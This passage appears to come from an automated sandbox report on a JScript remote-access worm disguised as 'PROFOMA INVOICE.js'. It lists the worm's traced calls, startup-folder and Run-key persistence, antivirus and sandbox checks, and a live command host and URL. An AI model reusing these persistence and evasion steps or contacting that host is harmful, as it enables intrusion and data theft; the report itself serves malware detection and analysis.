a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5C%22 a1:%22YES%22");ITextStream.WriteLine(" exec:11568 f:");ITextStream.WriteLine(" exit:11901 o:%5Bobject%20Object%5D f:gRgZg r:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%22");ITextStream.WriteLine(" entry:11891 o:%5Bobject%20Object%5D f:gRgZg a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%22 a1:%22%5C%22");ITextStream.WriteLine(" exec:11568 f:");ITextStream.WriteLine(" exit:11891 o:%5Bobject%20Object%5D f:gRgZg r:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5C%22");ITextStream.WriteLine(" entry:11881 o:%5Bobject%20Object%5D f:kDrBx a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5C%22 a1:%22FALSE%22");ITextStream.Write
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: SetRequestHeader a0:%22User-Agent%3A%22 a1:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5CFALSE%5C%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent:", "Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:11367 o: f:SetRequestHeader r:undefined");ITextStream.WriteLine(" entry:11354 f:dX a0:661 a1:%22BC%5DA%22");ITextStream.WriteLine(" exit:11354 f:dX r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:11350 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("")
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: SetRequestHeader a0:%22User-Agent%3A%22 a1:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5CFALSE%5C%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent:", "Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:11367 o: f:SetRequestHeader r:undefined");ITextStream.WriteLine(" entry:11354 f:dX a0:661 a1:%22BC%5DA%22");ITextStream.WriteLine(" exit:11354 f:dX r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:11350 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("")
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: SetRequestHeader a0:%22User-Agent%3A%22 a1:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5CFALSE%5C%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent:", "Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:11367 o: f:SetRequestHeader r:undefined");ITextStream.WriteLine(" entry:11354 f:dX a0:661 a1:%22BC%5DA%22");ITextStream.WriteLine(" exit:11354 f:dX r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:11350 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("")
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: PROFOMA INVOICE.js String : entropy: 6.04, length: 262, content: '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x7 Go to definition
Source: PROFOMA INVOICE.js String : entropy: 6.04, length: 262, content: '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x7 Go to definition
Source: PROFOMA INVOICE.js Array : entropy: 5.29, length: 477, content: '\x62\x53\x6B\x4C\x57\x51\x68\x63\x4B\x47\x46\x64\x4B\x53\x6F\x7A\x57\x50\x48\x4F''\x57\x50\x31\x30\ Go to definition
Source: PROFOMA INVOICE.js Array : entropy: 5.29, length: 477, content: '\x62\x53\x6B\x4C\x57\x51\x68\x63\x4B\x47\x46\x64\x4B\x53\x6F\x7A\x57\x50\x48\x4F''\x57\x50\x31\x30\ Go to definition

Boot Survival
barindex
Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DOK0DDU2VF Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DOK0DDU2VF Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 91.92.255.61 9987 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected VjW0rm
Source: Yara match File source: amsi64_7400.amsi.csv, type: OTHER

Remote Access Functionality
barindex
Yara detected VjW0rm
Source: Yara match File source: amsi64_7400.amsi.csv, type: OTHER
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430781 Sample: PROFOMA INVOICE.js Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 21 vjwmaster.duckdns.org 2->21 25 Snort IDS alert for network traffic 2->25 27 Multi AV Scanner detection for domain / URL 2->27 29 Found malware configuration 2->29 33 15 other signatures 2->33 6 wscript.exe 2 16 2->6         started        11 wscript.exe 13 2->11         started        13 wscript.exe 13 2->13         started        15 wscript.exe 2->15         started        signatures3 31 Uses dynamic DNS services 21->31 process4 dnsIp5 23 vjwmaster.duckdns.org 91.92.255.61, 49709, 49711, 49712 THEZONEBG Bulgaria 6->23 17 C:\Users\user\AppData\...\PROFOMA INVOICE.js, ASCII 6->17 dropped 19 C:\Users\user\AppData\...\PROFOMA INVOICE.js, ASCII 6->19 dropped 35 JScript performs obfuscated calls to suspicious functions 6->35 37 Drops script or batch files to the startup folder 6->37 39 Windows Scripting host queries suspicious COM object (likely to drop second stage) 6->39 41 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 6->41 43 System process connects to network (likely due to code injection or exploit) 11->43 file6 signatures7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.92.255.61
 vjwmaster.duckdns.org Bulgaria
34368 THEZONEBG true

Contacted Domains

Name IP Active
vjwmaster.duckdns.org 91.92.255.61 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://vjwmaster.duckdns.org:9987/Vre true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown